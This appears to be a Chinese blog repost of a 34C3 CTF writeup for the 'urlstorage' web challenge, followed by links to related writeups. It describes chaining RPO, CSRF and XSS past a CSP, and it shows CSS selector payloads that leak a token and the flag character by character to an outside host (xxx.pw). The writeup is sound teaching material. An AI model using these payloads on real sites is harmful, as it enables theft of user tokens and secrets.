34C3 CTF Web urlstorage Writeup

最新推荐文章于 2024-06-26 09:48:04 发布
最新推荐文章于 2024-06-26 09:48:04 发布
阅读量1k 收藏 2
点赞数 1
文章标签: 运维 php
原文链接:http://www.cnblogs.com/iamstudy/articles/2017_34C4_web_urlstorage_writeup.html
版权
本文探讨了RPO(Reflected POST Object)攻击原理及应用,通过实例分析如何利用此漏洞读取敏感信息并获取Flag。涉及CSRF、XSS等攻击手法,以及CSP防御策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

也是一个超高质量的题目,rpo获取网页信息,不过有一个非预期,nginx没有配置好,导致可以读取文件然后拿到flag。

804631-20180104151838534-1235470716.jpg

如果对rpo攻击不熟悉的话,可以先看看这
RPO攻击

几个信息点
1、csrf,个人的url地址保存的时候是可以进行csrf的

804631-20180104151851221-2068954669.jpg

结合网页加载的css,可导致rpo漏洞.

%0a%0d%0a%0a%0d%0a*%7B%7D*{}*{background:red}*{}*%0a%0d%0a

2、token处存在xss,有64字符的长度限制.

804631-20180104151905362-1253159682.jpg

3、csp防御

frame-ancestors 'none'; form-action 'self'; connect-src 'self'; script-src 'self'; font-src 'self' ; style-src 'self';
获取flag token链接

回到第一个rpo地方,可以通过css选择器去一个个匹配网页链接中的内容,然后再传输出来

第一位字符:

a[href^=flag\?token\=0]{background: url(//xxx.pw/rpo/?c=1);}
a[href^=flag\?token\=1]{background: url(//xxx.pw/rpo/?c=1);}
...
a[href^=flag\?token\=f]{background: url(//xxx.pw/rpo/?c=f);}

第二位字符:

a[href^=flag\?token\=10]{background: url(//xxx.pw/rpo/?c=10);}
a[href^=flag\?token\=11]{background: url(//xxx.pw/rpo/?c=11);}

其中还牵涉到一个问题,每次用户登录的后其token也在改变,所以需要在一次攻击中获取完。
可以通过循环调用的形式不断的获取剩下的字符。

804631-20180104151922940-311091293.jpg

进入token获取flag

这里有一个坑点就是,css选择器在匹配的时候首字符不能是数字,flag的格式为34C3,本地可测试一下

<input id=flag name=flag value="34C3_test">
<input id=blah name=blah value="foo">
<style>
#flag[value^=34C3]{background: url(http://xxx.pw?34c3);}
#blah[value^=foo]{background: url(http://xxx.pw?foo);}
</style>

发现浏览器只会发出foo的请求,对于这个可以有两种方式解决

1、使用css的*模糊匹配

#flag[value*=C3_1]{background: url(http://xxx.pw/?flag=C3_1);}

2、使用16进制编码

#flag[value^=\33\34\43\33]{background: url(http://xxx.pw/?34c3);}

最后利用base标签,加载urlstorage的页面rpo,然后去获取flag值

804631-20180104151934924-1282124576.jpg

exploit:
https://github.com/eboda/34c3ctf/blob/master/urlstorage/exploit/exploit.php

转载于:https://www.cnblogs.com/iamstudy/articles/2017_34C4_web_urlstorage_writeup.html

34C3 CTF Web题 extract0r Writeup (软链接实现任意读文件/目录+SSRF绕过内网ip黑名单+Gopher攻击MySQL+zip文件构造)
keyball123的博客
03-28 1万+
extract0r – A web challenge from hxp 34C3 CTF https://ctftime.org/event/544 题目部署 本地搭建: https://github.com/shimmeris/CTF-Web-Challenges/tree/master/SSRF/34c3-2017-extract0r 在34c3-2017-extract0r目录下执...
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 1036
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
[CTFTraining] 34C3CTF 2016 urlstorage
ZXW_NUDT的博客
06-01 1881
[CTFTraining] 34C3CTF 2016 urlstorage
34C3 ctf writeup
qq_27396789的博客
01-02 1413
又一篇writeup读后感。。什么时候能写自己的writeup。。miscminbashmaxfun Minimal bash - maximal fun! nc 35.198.107.77 1337 Difficulty: medium nc之后出现长这样的bash提示:min-bash>:,输入一些东西出现:+==============================
34c3ctf/extract0r/
偷一个月亮
01-14 446
搭建环境 问题一:使用Ubuntu17,发现源出现问题 # apt-get update Hit:1 http://ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu zesty InRelease Ign:2 http://cn.archive.ubuntu.com/ubuntu zesty InRelease Err:5 http://cn....
We Chall-Encodings- URL -Writeup
缠中说禅的博客
02-06 611
MarkdownPad Document We Chall-Encodings: URL -Writeup 题目链接:http://www.wechall.net/challenge/training/encodings/url/index.php 题目: 很明显的url解码即可,python脚本如下: import urllib.parse rawurl = "%59
171228 逆向-34c3ctf(m0rph)
whklhhhh的博客
12-29 899
1625-5 王子昂 总结《2017年12月28日》 【连续第454天总结】 A. 34c3ctf - m0rph B. 国际的CTF难度真是感人……OTZ虽然确实很好玩就是了64位elf文件,拖入IDA打开,找到main函数 哎哟,这么清晰的结构~真是Easy啊~太年轻了 仔细看看,len要求为23,再往下….v6是函数?qword_202020+8*i这里放着啥函数啊 点过去也
elgoog:来自34C3 CTF WCTF 2018的elgoogsearchme挑战
05-02
它在34C3 CTF上被称为“ elgoog2”,但有一个意外的错误。 带回WCTF 2018,作为“ searchme”。 我们有一个易受攻击的内核驱动程序,用于处理文档索引。 它使您可以通过将文档逐步添加到索引中来构建反向索引,...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
本文主要涉及的是网络安全领域中的CTF(Capture The Flag)竞赛,特别是Web安全相关的挑战。在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码...
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
在网络安全的领域里,CTF(Capture The Flag)竞赛已经成为了一种检验技能和提升知识的重要方式,特别是Web解题部分,它将理论与实践紧密结合,让参赛者在寻找隐藏的Flag中体验到黑客攻防的乐趣。为了在CTF Web解题...
替换url部分_强网杯Web部分writeup
weixin_39899630的博客
11-25 137
01题记2019年的强网杯Web题目出的都不错,所以对题目进行分析一下!02正文upload首先打开界面如下:有注册和登录功能!首先我们注册一个账户,然后登录,发现可以上传图片这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后对图片进行重命名操作,进而获得shell。但...
奇妙的 Storage::url
weixin_30778805的博客
08-18 562
发现 这是我在做头像上传功能时发现的,下面是图片上传的业务逻辑。 class AvatarController extends Controller { public function update(Request $request) { $this->validate($request, [ 'avatar' => 'requi...
CTF内存高级利用技术
weixin_30826761的博客
10-01 149
起了一个比较屌的标题,233。想写这篇文章主要是看了kelwya分析的议题,于是准备自己动手实践一下。蓝莲花的选手真的是国际大赛经验丰富,有很多很多的思路和知识我完全都没有听说过。这篇文章会写一些不常见但是确实出现过Pwn解题思路。 1.fastbin的第三种方式? 我们知道fastbin一般有两种利用方式,通过这两种利用可以实现任意地址分配堆。现在来谈一谈第三种利用方式 概述:基本思路...
探索34C3少年CTF的编程世界:解密pwn挑战
最新发布
gitblog_00015的博客
06-26 347
探索34C3少年CTF的编程世界:解密pwn挑战 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的世界里,CTF(Capture The Flag)竞赛是技术爱好者磨练技能的试炼场。今天,我们要向大家隆重介绍一个专为培养未来安全专家而设的宝藏项目——《34C3少年CTF pwnables》。 项目介绍 《34C3少年CTF pwnables》是一个精心设计的开源项目,...
ctf.show web 1-4 writeup
Sk1y的博客
02-17 564
web签到题 题目: ctf.show平台的,题目传送门 解题过程: 打开f12,看到一串编码 base64解码,即可得到flag.
智能合约逆向心法2(案例篇)——34C3_CTF题目分析续篇
Fly_鹏程万里
11-23 650
前言 上周34C3_CTF的文章分析得到了很好的反响,后台收到白帽子的反馈,说想了解整一个完整的分析过程是怎样的。 因此这篇文章,主要关于该题从零到有的思路,顺带解释一些solidity的特性与语法。 题目解读 send 1505 szabo 457282 babbage 649604 wei 0x949a6ac29b9347b3eb9a420272a9dd7890b787a3 1...
强网杯—share your mind了解RPO+XSS+CSRF
csu_vc的博客
03-27 2337
RPO(Relative Path Overwrite) 1.What is RPO RPO(相对路径覆盖)是一种通过覆盖目标文件来利用相对URL的技术。要了解这项技术,我们必须首先研究相对网址和绝对网址之间的差异。绝对URL基本上是包含协议和域名的目标地址的完整URL,而相对URL则是不指定域或协议,并使用现有目的地来确定协议和域。 Absolute URL https://gr...
前端使用 url/localStorage 将数据传到下一页
Sparrowflying的博客
03-28 1866
1、url —— 需要将少量数据传给下一页,可以直接加在url上如(1)设置下一页链接 https://www.test.com/index.html?type1(2)使用window.location.search 获取 href 属性中跟在问号后面的部分示例:var test = window.location.search;alert(test);返回:?type12、localStorag...
CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网杯)Crypto题解
cccchhhh6819的博客
10-25 7114
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值